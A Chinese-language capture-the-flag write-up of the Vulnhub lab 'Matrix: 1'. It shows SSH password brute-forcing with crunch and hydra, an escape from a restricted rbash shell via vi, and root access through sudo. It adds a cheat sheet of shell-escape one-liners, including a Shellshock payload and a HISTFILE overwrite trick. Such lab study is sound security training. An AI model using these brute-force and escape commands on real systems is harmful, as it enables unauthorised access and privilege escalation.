从 Matrix: 1 Vulnhub 学习rbash

开局靶机正常配置走host-only
nmap进行主机发现，找到对应的主机，扫描端口

开启了

访问80端口
啥都没有,于是访问31337端口

在源码发现一串base64

解密后发现一个文件，通过web访问

是一个brainfuck文件（https://www.splitbrain.org/_static/ook/）在线解密得到前6位密码

使用crunch创建一个单词表，进行ssh登录爆破
crunch 8 8 -t k1ll0r%@ -o dict.txt
hydra -l guest -P dict.txt 192.168.1.18 ssh

得到密码ssh登录发现有rbash，很多命令都不能执行

vi可以，echo可以并发现有rbash也就是受限的shell
在渗透过程中，会遇到有些环境中的shell是受限制的，这些shell环境叫restricted shell
以下功能受限：

通过 cd 来改变工作目录
设置或取消环境变量： SHELL， PATH， ENV， BASH_ENV
命令名中不能包含目录分隔符 ‘/’
包含有 ‘/’ 的文件名作为内置命令 ‘.’ 的参数
hash 内置命令有 -p 选项时的文件名参数包含 ‘/’
在启动时通过 shell 环境导入函数定义
在启动时通过 shell 环境解析 SHELLOPTS 的值
使用 >，>|， <>， >&， &>， >> 等重定向操作符
使用 exec 内置命令
通过 enable 内置命令的 -f 和 -d 选项增加或删除内置命令
使用 enable 内置命令来禁用或启用 shell 内置命令
执行 command 内置命令时加上 -p 选项
通过 set +r 或 set +o restricted 关闭受限模式

受限的类型有

		rbash
		rsh
		rksh
		python

如何打破
尽量找出自己所处环境是什么样子：

运行env查看环境变量
运行echo $PATH查找路径设置
运行echo $SHELL或者echo $0查看运行的shell环境
查看基本的Unix命令，比如ls,pwd,cd ..,env,set,export,vi,cp,mv
shell变量和路径设置：
如果/允许使用，直接运行/bin/sh
如果可以进行路径设置、shell变量设置，就可以运行：
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/sh
如果可以复制文件到存在的路径，就可以运行cp /bin/sh /some/dir/from/PATH; sh

就本题而言
vi命令可以使用，就可以通过vi !/bin/sh(!/bin/bash)来启动一个不受限的bash

转义受限的shell环境后，我们将/ bin / bash导出到SHELL环境变量，并将“ / usr / bin ”目录导出到PATH环境变量，以便我们可以正确运行Linux命令。

export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH

导出到环境变量后，我们检查了sudoers列表，发现由于拥有所有权利，我们可以直接获取root shell。

sudo -l
sudo su

由于尚未将“ / bin ”目录导出到PATH环境中，因此无法执行“ su ”命令。我们将“ / bin ”目录导出到PATH环境变量中，然后再次运行该命令以使用我们先前找到的密码以root用户身份登录。

export PATH=/bin:$PATH
sudo su

然后到根目录下cat flag

补充
有一些系统命令常常可以绕过限制：

ftp->!/bin/sh
gdb->!/bin/sh
more/less/man->!/bin/sh
vi/vim->:!/bin/sh
scp -S tmp/getMeOut.sh x y
awk ‘BEGIN {system(‘/bin/sh’)}’
find / -name someName -exec /bin/sh \;

逃脱限制：

在远程shell连接加载完成之前执行系统命令
ssh test@IP -t '/bin/sh'
在远程shell开始的时候，不加载限制配置文件
ssh test@IP -t "bash --noprofile"
尝试破壳漏洞
ssh test@IP -t "() { :; }; /bin/bash"

深入：

使用tee命令
echo “your evil code”	tee script.sh
通过脚本语言调用shell
python -c 'import os; os.system("/bin/bash")'
perl -e ‘exec “/bin/sh”;’
历史文件技巧
将一个想要重写的文件中设置HISTFILE变量
将HISTFILE变量从0到100逐渐递增
执行文件中每行写入的内容
登出并重新登陆。这样就将所想写入的内容指向了HISTFILE文件(原文件权限保持不变)

参考：

https://www.hackingarticles.in/matrix-1-vulnhub-walkthrough/
https://b404.xyz/2018/07/03/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells/
http://kuanghy.github.io/2017/02/20/rbash
http://pentestmonkey.net/blog/rbash-scp
https://pen-testing.sans.org/blog/pen-testing/2012/06/06/escaping-restricted-linux-shells